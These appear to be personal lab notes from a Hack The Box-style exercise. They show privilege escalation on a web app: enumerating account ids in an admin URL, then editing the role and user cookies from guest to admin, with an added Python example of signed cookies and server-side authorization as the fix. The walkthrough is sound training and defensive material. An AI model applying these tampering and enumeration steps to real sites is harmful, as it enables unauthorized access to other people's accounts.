PARAMETER MANIPULATION & COOKIE TAMPERING
#walk the application
root@htb:~$ BROWSER > {targetSite:port}
Services
We provide services to operate manufacturing data such as quotes,
customer requests etc. Please login to get access to the service.
* no visible login page identified
#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
Search: Proxy
root@oco:~$ BROWSER > Network Settings > Settings
Configure Proxy Access to the Internet
Manual Proxy Configuration: enabled
HTTP Proxy: 127.0.0.1
Port: 8080 {default Burp listening port}
Also Use this Proxy for HTTPS: enabled
* it is advisable to also check the option "Also use this proxy for FTP and HTTPS" in order to have all requests go through BurpSuite
#step 2: disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
Intercept is on: disabled
* Burp's intercept is enabled by default
#step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}
* can also simply refresh the page if already on the target site
#step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
http://10.129.203.93
-> /
-> cdn-cgi
-> login
-> script.js
-> css
-> js
-> themes
#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest
* can also brute force the page
* identify possible entry points on the webapp
- Account page
Access ID Name Email
2233 guest guest@megacorp.com
- Uploads page; this requires admin privileges
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
name value
role guest ...
user 2233 ...
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
* the guest account's record id is exposed in the URL; the admin account can be found by changing the id value manually or with an automated tool
#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
Access ID Name Email
34322 admin admin@megacorp.com
* enumerate for the admin account by changing the id value until the admin record is returned
- admin info identified
#exploit via changing cookie value
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
name value
role admin ...
user 34322 ...
* reload the page to escalate privilege to admin
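Added defensive example, not part of the original notes: the flaw above exists because the server reads role and user straight from client-controlled cookies and exposes a guessable account id with no ownership check. The hardened variant below stores only an HMAC-signed user id in the cookie, looks the role up server-side, and enforces that a non-admin may only view their own account. The secret, the user store and the function names are assumptions for illustration.

```python
import hashlib
import hmac

# Server-side secret; constructed value for the example only.
SECRET = b"example-server-secret-do-not-reuse"

# Constructed user store keyed by access ID (mirrors the two accounts in the notes).
USERS = {"2233": "guest", "34322": "admin"}


def vulnerable_role(cookies: dict) -> str:
    """The pattern in the notes: role is trusted straight from the cookie,
    so editing role=guest to role=admin in the browser grants admin."""
    return cookies.get("role", "guest")


def issue_session(user_id: str) -> str:
    """Issue a tamper-evident cookie of the form '<user_id>.<hmac-sha256>'.
    The role is deliberately NOT stored in the cookie."""
    tag = hmac.new(SECRET, user_id.encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{tag}"


def verify_session(cookies: dict):
    """Return the user id only if the cookie's signature checks out, else None.
    Changing either half of the cookie fails the constant-time comparison."""
    user_id, sep, tag = cookies.get("session", "").partition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, user_id.encode(), hashlib.sha256).hexdigest()
    return user_id if hmac.compare_digest(expected, tag) else None


def hardened_role(cookies: dict) -> str:
    """Derive the role from the server-side store, never from the cookie."""
    user_id = verify_session(cookies)
    return USERS.get(user_id, "anonymous") if user_id else "anonymous"


def can_view_account(cookies: dict, requested_id: str) -> bool:
    """Authorization for ?content=accounts&id=...: admins may view any record,
    everyone else only their own. This is the missing check behind the id
    enumeration in the notes (access ID used as the record key for simplicity)."""
    user_id = verify_session(cookies)
    if user_id is None:
        return False
    return USERS.get(user_id) == "admin" or user_id == requested_id
```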